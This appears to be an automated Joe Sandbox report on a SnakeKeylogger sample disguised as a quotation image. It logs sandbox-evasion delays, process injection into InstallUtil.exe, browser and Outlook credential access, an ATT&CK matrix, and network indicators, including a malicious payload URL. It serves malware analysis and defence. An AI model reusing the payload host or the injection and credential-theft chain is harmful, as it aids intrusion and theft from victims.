                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594475
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594097
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2619Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7208Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5259Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4551Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5657
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596042Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595911Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595551Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595436Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595327Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594523Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594420Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594310Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599064
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596815
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596592
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594475
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594097
                Source: Gydvapkca.exe, 00000003.00000002.2221122194.0000000000901000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
                Source: Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: model0Microsoft|VMWare|Virtual
                Source: InstallUtil.exe, 00000007.00000002.4520592957.0000000000978000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2087239384.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4520094050.0000000001258000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4521083391.0000000001139000.00000004.00000020.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2297730611.0000000000840000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 5_2_06817D90 LdrInitializeThunk,5_2_06817D90
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: DE8008
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B5A008
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 382000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3A2000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3A4000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 54C008
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Queries volume information: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe VolumeInformation
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Queries volume information: C:\Users\user\AppData\Roaming\Gydvapkca.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 5500, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 5780, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

Source: Yara match, File source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 5500, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 5780, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
[Figure: Behavior Graph. ID: 1519289, Sample: RFQ____RM quotation_JPEG IM..., Startdate: 26/09/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| RFQ____RM quotation_JPEG IMAGE.img.exe | 63% | ReversingLabs | Win32.Trojan.SnakeKeylogger | |
| RFQ____RM quotation_JPEG IMAGE.img.exe | 100% | Avira | HEUR/AGEN.1323682 | |
| RFQ____RM quotation_JPEG IMAGE.img.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\Gydvapkca.exe | 100% | Avira | HEUR/AGEN.1323682 | |
| C:\Users\user\AppData\Roaming\Gydvapkca.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Roaming\Gydvapkca.exe | 63% | ReversingLabs | Win32.Trojan.SnakeKeylogger | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://checkip.dyndns.org/ | 0% | URL Reputation | safe | |
| https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe | |
| https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe | |
| https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe | |
| http://checkip.dyndns.org/q | 0% | URL Reputation | safe | |
| https://reallyfreegeoip.org | 0% | URL Reputation | safe | |
| http://checkip.dyndns.org | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe | |
| https://wymascensores.com/panel/Skdqhzzwa.mp3 | 0% | Avira URL Cloud | safe | |
| http://checkip.dyndns.orgh | 0% | Avira URL Cloud | safe | |
| https://wymascensores.com | 0% | Avira URL Cloud | safe | |
| http://checkip.dyndns.com | 0% | Avira URL Cloud | safe | |
| https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe | |
| https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe | |
| https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | Avira URL Cloud | safe | |
| https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | Avira URL Cloud | safe | |
| https://github.com/mgravell/protobuf-netJ | 0% | Avira URL Cloud | safe | |
| http://reallyfreegeoip.org | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| wymascensores.com | 67.212.175.162 | true | true | | unknown |
| reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown |
| checkip.dyndns.com | 158.101.44.242 | true | false | | unknown |
| checkip.dyndns.org | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://wymascensores.com/panel/Skdqhzzwa.mp3 | true | Avira URL Cloud: safe | unknown |
| http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown |
| https://reallyfreegeoip.org/xml/8.46.123.33 | false | Avira URL Cloud: safe | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://github.com/mgravell/protobuf-neti | RFQ____RM quotation_JPEG IMAGE.img.exe | false | Avira URL Cloud: safe | unknown |
| https://stackoverflow.com/q/14436606/23354 | RFQ____RM quotation_JPEG IMAGE.img.exe, Gydvapkca.exe | false | URL Reputation: safe | unknown |
| https://github.com/mgravell/protobuf-netJ | RFQ____RM quotation_JPEG IMAGE.img.exe, Gydvapkca.exe | false | Avira URL Cloud: safe | unknown |
| https://reallyfreegeoip.org/xml/8.46.123.33$ | InstallUtil.exe | false | Avira URL Cloud: safe | unknown |
| https://stackoverflow.com/q/11564914/23354; | RFQ____RM quotation_JPEG IMAGE.img.exe | false | URL Reputation: safe | unknown |
| https://stackoverflow.com/q/2152978/23354 | RFQ____RM quotation_JPEG IMAGE.img.exe | false | URL Reputation: safe | unknown |
| http://checkip.dyndns.orgh | InstallUtil.exe | false | Avira URL Cloud: safe | unknown |
| http://checkip.dyndns.org/q | RFQ____RM quotation_JPEG IMAGE.img.exe, Gydvapkca.exe, InstallUtil.exe | false | URL Reputation: safe | unknown |
| http://reallyfreegeoip.org | InstallUtil.exe | false | Avira URL Cloud: safe | unknown |
| https://github.com/mgravell/protobuf-net | RFQ____RM quotation_JPEG IMAGE.img.exe | false | Avira URL Cloud: safe | unknown |
| https://reallyfreegeoip.org | InstallUtil.exe | false | URL Reputation: safe | unknown |
| http://checkip.dyndns.org | InstallUtil.exe | false | URL Reputation: safe | unknown |
| http://checkip.dyndns.com | InstallUtil.exe | false | Avira URL Cloud: safe | unknown |
| https://wymascensores.com | RFQ____RM quotation_JPEG IMAGE.img.exe, Gydvapkca.exe | false | Avira URL Cloud: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ____RM quotation_JPEG IMAGE.img.exe, InstallUtil.exe, Gydvapkca.exe | false | URL Reputation: safe | unknown |
| https://reallyfreegeoip.org/xml/ | RFQ____RM quotation_JPEG IMAGE.img.exe, InstallUtil.exe, Gydvapkca.exe | false | URL Reputation: safe | unknown |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 67.212.175.162 | wymascensores.com | United States | | 32475 | SINGLEHOP-LLCUS | true |
| 188.114.96.3 | reallyfreegeoip.org | European Union | | 13335 | CLOUDFLARENETUS | true |
| 158.101.44.242 | checkip.dyndns.com | United States | | 31898 | ORACLE-BMC-31898US | false |
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519289
                        Start date and time:2024-09-26 09:57:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 19s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:9
